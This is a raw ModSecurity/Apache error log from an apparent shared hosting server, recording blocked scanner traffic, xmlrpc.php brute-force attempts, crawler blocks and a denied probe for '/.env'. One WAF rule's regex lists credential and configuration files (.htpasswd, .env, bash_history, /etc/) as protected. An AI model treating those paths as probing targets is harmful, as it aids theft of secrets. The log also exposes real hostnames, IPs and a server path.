[Tue May 26 16:44:04.139574 2026] [security2:error] [pid 823496:tid 823564] [remote 216.73.216.30:54112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAfJa08mrtyBNpA4PM3AAAakE"]
[Tue May 26 16:44:04.243816 2026] [security2:error] [pid 823496:tid 823656] [client 185.185.217.76:49371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-rk.php"] [unique_id "ahWAfJa08mrtyBNpA4PM3QAAABw"]
[Tue May 26 16:44:04.828885 2026] [security2:error] [pid 817651:tid 817862] [client 185.185.217.76:49638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-website-terms.php"] [unique_id "ahWAfNlGRCPPN1dS2y2waAAAANY"]
[Tue May 26 16:44:05.414906 2026] [security2:error] [pid 823496:tid 823675] [client 185.185.217.76:49979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-website-disclaimer.php"] [unique_id "ahWAfZa08mrtyBNpA4PM7gAAAC8"]
[Tue May 26 16:44:05.632096 2026] [security2:error] [pid 823496:tid 823713] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAfJa08mrtyBNpA4PM5wAAAFU"]
[Tue May 26 16:44:06.010462 2026] [security2:error] [pid 823496:tid 823668] [client 185.185.217.76:50480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-website-privacy.php"] [unique_id "ahWAfpa08mrtyBNpA4PM8wAAACg"]
[Tue May 26 16:44:07.803795 2026] [security2:error] [pid 823496:tid 823719] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAfpa08mrtyBNpA4PM_gAAAFs"]
[Tue May 26 16:44:07.998282 2026] [security2:error] [pid 823496:tid 823667] [client 117.198.37.168:58478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAf5a08mrtyBNpA4PNCwAAACc"]
[Tue May 26 16:44:07.998469 2026] [security2:error] [pid 823496:tid 823667] [client 117.198.37.168:58478] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAf5a08mrtyBNpA4PNCwAAACc"]
[Tue May 26 16:44:09.395273 2026] [security2:error] [pid 823496:tid 823682] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAgJa08mrtyBNpA4PNEgAAADY"]
[Tue May 26 16:44:10.791498 2026] [core:crit] [pid 817651:tid 817820] (13)Permission denied: [client 52.167.144.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:44:11.489644 2026] [security2:error] [pid 817651:tid 817864] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAgtlGRCPPN1dS2y2wjgAAANg"]
[Tue May 26 16:44:13.334836 2026] [security2:error] [pid 823496:tid 823687] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAhJa08mrtyBNpA4PNPgAAADs"]
[Tue May 26 16:44:15.763996 2026] [security2:error] [pid 823496:tid 823675] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAhpa08mrtyBNpA4PNYAAAAC8"]
[Tue May 26 16:44:15.982908 2026] [core:crit] [pid 823496:tid 823705] (13)Permission denied: [client 207.46.13.153:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:44:18.323361 2026] [security2:error] [pid 823496:tid 823650] [client 117.198.37.168:58814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAipa08mrtyBNpA4PNigAAABY"]
[Tue May 26 16:44:18.323490 2026] [security2:error] [pid 823496:tid 823650] [client 117.198.37.168:58814] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAipa08mrtyBNpA4PNigAAABY"]
[Tue May 26 16:44:19.361843 2026] [security2:error] [pid 817651:tid 817907] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAiNlGRCPPN1dS2y2w0AAAAQM"]
[Tue May 26 16:44:20.681521 2026] [core:crit] [pid 823496:tid 823642] (13)Permission denied: [client 52.167.144.206:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:44:20.919590 2026] [security2:error] [pid 823496:tid 823663] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAipa08mrtyBNpA4PNkwAAACM"]
[Tue May 26 16:44:21.381801 2026] [security2:error] [pid 817651:tid 817894] [client 23.251.59.147:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAitlGRCPPN1dS2y2w2QAAAPY"]
[Tue May 26 16:44:22.960820 2026] [security2:error] [pid 823496:tid 823661] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAjJa08mrtyBNpA4PNrgAAACE"]
[Tue May 26 16:44:24.427095 2026] [security2:error] [pid 823496:tid 823630] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAjpa08mrtyBNpA4PNvwAAAAI"]
[Tue May 26 16:44:26.417853 2026] [security2:error] [pid 823496:tid 823670] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAkJa08mrtyBNpA4PN0AAAACo"]
[Tue May 26 16:44:28.496281 2026] [security2:error] [pid 823496:tid 823646] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAkpa08mrtyBNpA4PN8QAAABI"]
[Tue May 26 16:44:29.029728 2026] [security2:error] [pid 817651:tid 817879] [client 117.198.37.168:59132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAldlGRCPPN1dS2y2xWwAAAOc"]
[Tue May 26 16:44:29.029919 2026] [security2:error] [pid 817651:tid 817879] [client 117.198.37.168:59132] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAldlGRCPPN1dS2y2xWwAAAOc"]
[Tue May 26 16:44:30.176588 2026] [security2:error] [pid 823496:tid 823654] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAlJa08mrtyBNpA4POEwAAABo"]
[Tue May 26 16:44:32.727289 2026] [security2:error] [pid 823496:tid 823689] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAlpa08mrtyBNpA4POKgAAAD0"]
[Tue May 26 16:44:34.011258 2026] [security2:error] [pid 823496:tid 823697] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAmJa08mrtyBNpA4POPgAAAEU"]
[Tue May 26 16:44:34.212797 2026] [proxy:error] [pid 823496:tid 823692] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:44:34.212867 2026] [proxy_http:error] [pid 823496:tid 823692] [client 198.235.24.113:61890] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:44:34.213443 2026] [proxy:error] [pid 823496:tid 823692] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:44:34.213475 2026] [proxy_http:error] [pid 823496:tid 823692] [client 198.235.24.113:61890] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:44:35.975873 2026] [security2:error] [pid 823496:tid 823726] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAm5a08mrtyBNpA4POfwAAAGI"]
[Tue May 26 16:44:37.396450 2026] [security2:error] [pid 817651:tid 817883] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAnNlGRCPPN1dS2y2xhgAAAOs"]
[Tue May 26 16:44:37.751179 2026] [security2:error] [pid 817651:tid 817790] [client 103.174.5.177:59304] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWAndlGRCPPN1dS2y2xjgAAAI4"]
[Tue May 26 16:44:39.217280 2026] [security2:error] [pid 823496:tid 823515] [remote 216.73.216.30:46372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAn5a08mrtyBNpA4POuAAAdBA"]
[Tue May 26 16:44:39.486156 2026] [security2:error] [pid 817651:tid 817847] [client 117.198.37.168:59451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAn9lGRCPPN1dS2y2xnAAAAMc"]
[Tue May 26 16:44:39.486260 2026] [security2:error] [pid 817651:tid 817847] [client 117.198.37.168:59451] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAn9lGRCPPN1dS2y2xnAAAAMc"]
[Tue May 26 16:44:40.255466 2026] [security2:error] [pid 823496:tid 823657] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAn5a08mrtyBNpA4POwQAAAB0"]
[Tue May 26 16:44:41.242514 2026] [security2:error] [pid 823496:tid 823674] [client 176.65.139.238:18474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ishutranslogistics.onesoft.in"] [uri "/.env"] [unique_id "ahWAoZa08mrtyBNpA4PO5AAAAC4"]
[Tue May 26 16:44:42.143743 2026] [security2:error] [pid 823496:tid 823650] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAoZa08mrtyBNpA4PO6wAAABY"]
[Tue May 26 16:44:43.934208 2026] [security2:error] [pid 817651:tid 817783] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAo9lGRCPPN1dS2y2xtAAAAIc"]
[Tue May 26 16:44:44.541514 2026] [security2:error] [pid 823496:tid 823527] [remote 216.73.216.30:20750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWApJa08mrtyBNpA4PPGwAABxw"]
[Tue May 26 16:44:45.893750 2026] [security2:error] [pid 823496:tid 823674] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWApJa08mrtyBNpA4PPFgAAAC4"]
[Tue May 26 16:44:46.276010 2026] [security2:error] [pid 823496:tid 823701] [client 222.253.68.175:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWApJa08mrtyBNpA4PPHgAAAEk"]
[Tue May 26 16:44:47.870526 2026] [security2:error] [pid 823496:tid 823685] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAppa08mrtyBNpA4PPOgAAADk"]
[Tue May 26 16:44:48.419714 2026] [security2:error] [pid 823496:tid 823638] [client 185.191.171.9:42942] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/day/2022-11-21/"] [unique_id "ahWAqJa08mrtyBNpA4PPSwAAAAo"]
[Tue May 26 16:44:48.419888 2026] [security2:error] [pid 823496:tid 823638] [client 185.191.171.9:42942] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/day/2022-11-21/"] [unique_id "ahWAqJa08mrtyBNpA4PPSwAAAAo"]
[Tue May 26 16:44:49.232519 2026] [security2:error] [pid 823496:tid 823521] [remote 216.73.216.30:20750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAqZa08mrtyBNpA4PPUQAAAhY"]
[Tue May 26 16:44:49.754001 2026] [security2:error] [pid 823496:tid 823672] [client 117.198.37.168:59768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAqZa08mrtyBNpA4PPXQAAACw"]
[Tue May 26 16:44:49.754123 2026] [security2:error] [pid 823496:tid 823672] [client 117.198.37.168:59768] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAqZa08mrtyBNpA4PPXQAAACw"]
[Tue May 26 16:44:50.189976 2026] [security2:error] [pid 823496:tid 823745] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAqZa08mrtyBNpA4PPUwAAAHU"]
[Tue May 26 16:44:51.780448 2026] [security2:error] [pid 817651:tid 817855] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAqtlGRCPPN1dS2y2x8AAAAM8"]
[Tue May 26 16:44:53.953838 2026] [security2:error] [pid 817651:tid 817797] [client 43.172.198.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWArdlGRCPPN1dS2y2yDwAAAJU"]
[Tue May 26 16:44:54.529779 2026] [security2:error] [pid 817651:tid 817859] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWArNlGRCPPN1dS2y2yCwAAANM"]
[Tue May 26 16:44:56.557605 2026] [security2:error] [pid 817651:tid 817809] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWArtlGRCPPN1dS2y2yPgAAAKE"]
[Tue May 26 16:44:58.373428 2026] [security2:error] [pid 817651:tid 817782] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAsNlGRCPPN1dS2y2yWQAAAIY"]
[Tue May 26 16:44:59.249815 2026] [security2:error] [pid 823496:tid 823594] [remote 216.73.216.30:59241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahWAs5a08mrtyBNpA4PPlAAAal8"]
[Tue May 26 16:45:00.306787 2026] [security2:error] [pid 817651:tid 817786] [client 117.198.37.168:60082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAtNlGRCPPN1dS2y2ygAAAAIo"]
[Tue May 26 16:45:00.306962 2026] [security2:error] [pid 817651:tid 817786] [client 117.198.37.168:60082] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAtNlGRCPPN1dS2y2ygAAAAIo"]
[Tue May 26 16:45:00.573671 2026] [security2:error] [pid 823496:tid 823750] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAspa08mrtyBNpA4PPkwAAAHo"]
[Tue May 26 16:45:02.188102 2026] [security2:error] [pid 823496:tid 823631] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAtJa08mrtyBNpA4PPqAAAAAM"]
[Tue May 26 16:45:04.008737 2026] [security2:error] [pid 817651:tid 817845] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAttlGRCPPN1dS2y2yqgAAAMU"]
[Tue May 26 16:45:06.239486 2026] [security2:error] [pid 823496:tid 823607] [remote 74.7.241.58:41994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWAupa08mrtyBNpA4PQKgAASmw"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:45:06.724139 2026] [security2:error] [pid 823496:tid 823748] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAuZa08mrtyBNpA4PQIgAAAHg"]
[Tue May 26 16:45:07.882997 2026] [security2:error] [pid 817651:tid 817816] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAu9lGRCPPN1dS2y2yxwAAAKg"]
[Tue May 26 16:45:09.325050 2026] [security2:error] [pid 817651:tid 817890] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAvNlGRCPPN1dS2y2y1QAAAPI"]
[Tue May 26 16:45:10.838067 2026] [security2:error] [pid 823496:tid 823678] [client 117.198.37.168:60400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAvpa08mrtyBNpA4PQVgAAADI"]
